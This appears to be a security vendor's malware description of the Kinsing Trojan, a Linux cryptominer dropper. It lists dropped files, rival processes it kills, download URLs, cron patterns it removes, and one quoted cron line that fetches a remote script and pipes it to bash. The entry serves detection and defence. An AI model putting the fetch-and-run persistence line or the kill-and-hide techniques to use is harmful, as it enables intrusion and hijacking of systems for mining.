Trojan.SH.KINSING.H

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan drops the following files:

• If ran as root:
  • /etc/kinsing
• If not ran as root, any of the following:
  • /tmp/kinsing
  • /var/tmp/kinsing
  • /dev/shm/kinsing
• /proc/sys/kernel/nmi_watchdog
• /etc/sysctl.conf

Other System Modifications

This Trojan deletes the following files:

• /etc/ld.so.preload

Process Termination

This Trojan terminates the following processes if found running in the affected system's memory:

• .git/kthreaddw
• {BLOCKED}.206.105
• {BLOCKED}.87.6
• p8444
• supportxmr
• monero
• kthreaddi
• srv00
• /tmp/.javae/javae
• .javae
• .syna
• .main
• xmm
• solr.sh
• /tmp/.solr/solrd
• /tmp/javac
• /tmp/.go.sh
• /tmp/.x/agetty
• /tmp/.x/kworker
• c3pool
• /tmp/.X11-unix/gitag-ssh
• /tmp/1
• /tmp/okk.sh
• /tmp/gitaly
• /tmp/.x/kworker
• 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB
• /tmp/.X11-unix/supervise
• /tmp/.ssh/redis.sh
• zsvc
• pdefenderd
• updatecheckerd
• cruner
• dbused
• bashirc
• meminitsrv
• Process connecting to {BLOCKED}.87.6, no "-"
• Process connecting to 127.0.0.1:52018, no "-"
• Process connecting to {BLOCKED}.218.76:9486, no "-"
• Process connecting to {BLOCKED}.28.216:9486, no "-"
• Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey, or does not have kinsing
• Process with 8 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
• Process with 16 characters in its process name, does not have bin, or does not have [, or does not have (, or does not have php-fpm, or does not have proxyma, or does not have postgres, or does not have postgrey
• Process with string "./oka", no grep
• Process with string "postgres: autovacum", no grep
• Process with string "/tmp/sscks", no grep
• Process with string "agetty", no grep
• {BLOCKED}.28.216
• Process found in the following files:
  • /tmp/.X11-unix/01
  • /tmp/.X11-unix/11
  • /tmp/.X11-unix/22
  • /tmp/.pg_stat.0
  • /tmp/.pg_stat.1
  • $HOME/data/./oka.pid

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

• http://{BLOCKED}158.44/kinsing
• http://{BLOCKED}.158.44/curl-amd64
• http://{BLOCKED}.158.44/libsystem.so

Other Details

This Trojan does the following:

• Delete cron jobs with the following strings:
  • /base64/d
  • /_cron/d
  • /{BLOCKED}.20.181/d
  • /update.sh/d
  • /logo4/d
  • /logo9/d
  • /logo0/d
  • /logo/d
  • /tor2web/d
  • /jpg/d
  • /png/d
  • /tmp/d
  • /zmreplchkr/d
  • /aliyun.one/d
  • /{BLOCKED}.110.66.one/d
  • /pastebin/d
  • /onion/d
  • /lsd.systemten.org/d
  • /shuf/d
  • /ash/d
  • /mr.sh/d
  • /{BLOCKED}.10.234/d
  • /localhost.xyz/d
  • /{BLOCKED}.151.106/d
  • /{BLOCKED}.159.106/d
  • /github/d
  • /bi{BLOCKED}k.com/d
  • /xmr.i{BLOCKED}e.com/d
  • /{BLOCKED}.10.234/d
  • /{BLOCKED}.79.230/d
  • /{BLOCKED}.164.83/d
  • /newdat.sh/d
  • /lib.p{BLOCKED}m.com /d
  • /t.a{BLOCKED}.com/d
  • /update.sh/d
  • /systemd-service.sh/d
  • /pg_stat.sh/d
  • /sleep/d
  • /oka/d
  • /linux1213/d
  • /#wget/d
  • /#curl/d
  • /zsvc/d
  • /givemexyz/d
  • /world/d
  • /1.sh/d
  • /3.sh/d
  • /workers/d
  • /oracleservice/d
• Adds the following cron job:
  • http://{BLOCKED}.32.198/lh.sh | bash > /dev/null 2>&1
• It installs the following service:
  • /lib/systemd/system/bot.service
• It deletes the command history.
• It tries to install curl, wget, cron if they do not exist in the affected system